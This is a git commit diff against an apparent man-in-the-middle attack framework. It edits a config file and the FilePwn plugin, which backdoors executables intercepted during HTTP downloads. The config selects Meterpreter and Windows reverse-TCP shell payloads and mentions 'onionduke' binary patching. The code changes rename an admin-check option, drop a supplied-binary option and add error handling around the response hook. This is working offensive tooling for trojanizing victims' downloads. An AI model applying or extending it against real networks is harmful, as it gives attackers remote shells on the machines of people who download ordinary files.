This commit is contained in:
DKingCN 2016-01-12 14:48:36 +00:00
commit e69361d8ce
2 changed files with 11 additions and 12 deletions

View file

@ -457,10 +457,10 @@
# RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable # RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable
RUNAS_ADMIN = False RUNAS_ADMIN = False
# XP_MODE - to support XP targets # XP_MODE - to support XP targets
XP_MODE = True #XP_MODE = True
# SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and # SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and
# with PATCH_METHOD 'replace' use an EXE not DLL # with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = veil_go_payload.exe #SUPPLIED_BINARY = veil_go_payload.exe
MSFPAYLOAD = windows/meterpreter/reverse_tcp MSFPAYLOAD = windows/meterpreter/reverse_tcp
[[[[WindowsIntelx64]]]] [[[[WindowsIntelx64]]]]
@ -479,7 +479,7 @@
RUNAS_ADMIN = False RUNAS_ADMIN = False
# SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and # SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and
# with PATCH_METHOD 'replace' use an EXE not DLL # with PATCH_METHOD 'replace' use an EXE not DLL
SUPPLIED_BINARY = pentest_x64_payload.exe #SUPPLIED_BINARY = pentest_x64_payload.exe
MSFPAYLOAD = windows/x64/shell/reverse_tcp MSFPAYLOAD = windows/x64/shell/reverse_tcp
[[[[MachoIntelx86]]]] [[[[MachoIntelx86]]]]

View file

@ -374,12 +374,11 @@ class FilePwn(Plugin):
ADD_SECTION=add_section, ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping, CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType, IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']), PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']), ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(), PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'],
) )
result = targetFile.run_this() result = targetFile.run_this()
@ -408,13 +407,11 @@ class FilePwn(Plugin):
ADD_SECTION=add_section, ADD_SECTION=add_section,
CAVE_JUMPING=cave_jumping, CAVE_JUMPING=cave_jumping,
IMAGE_TYPE=self.WindowsType, IMAGE_TYPE=self.WindowsType,
RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']),
PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']), PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']),
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']), ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']),
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(), PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'],
XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE'])
) )
result = targetFile.run_this() result = targetFile.run_this()
@ -610,7 +607,7 @@ class FilePwn(Plugin):
self.log.debug("Updating Config {0}: {1}".format(key, value)) self.log.debug("Updating Config {0}: {1}".format(key, value))
def response(self, response, request, data): def response(self, response, request, data):
try:
content_header = response.headers['content-type'] content_header = response.headers['content-type']
client_ip = request.client.getClientIP() client_ip = request.client.getClientIP()
host = request.headers['host'] host = request.headers['host']
@ -674,4 +671,6 @@ class FilePwn(Plugin):
self.clientlog.error(exc, extra=request.clientInfo) self.clientlog.error(exc, extra=request.clientInfo)
self.clientlog.warning("Returning original file", extra=request.clientInfo) self.clientlog.warning("Returning original file", extra=request.clientInfo)
return {'response': response, 'request': request, 'data': data} return {'response': response, 'request': request, 'data': data}
except:
self.clientlog.error('Filepwn failed to response this request', extra=request.clientInfo)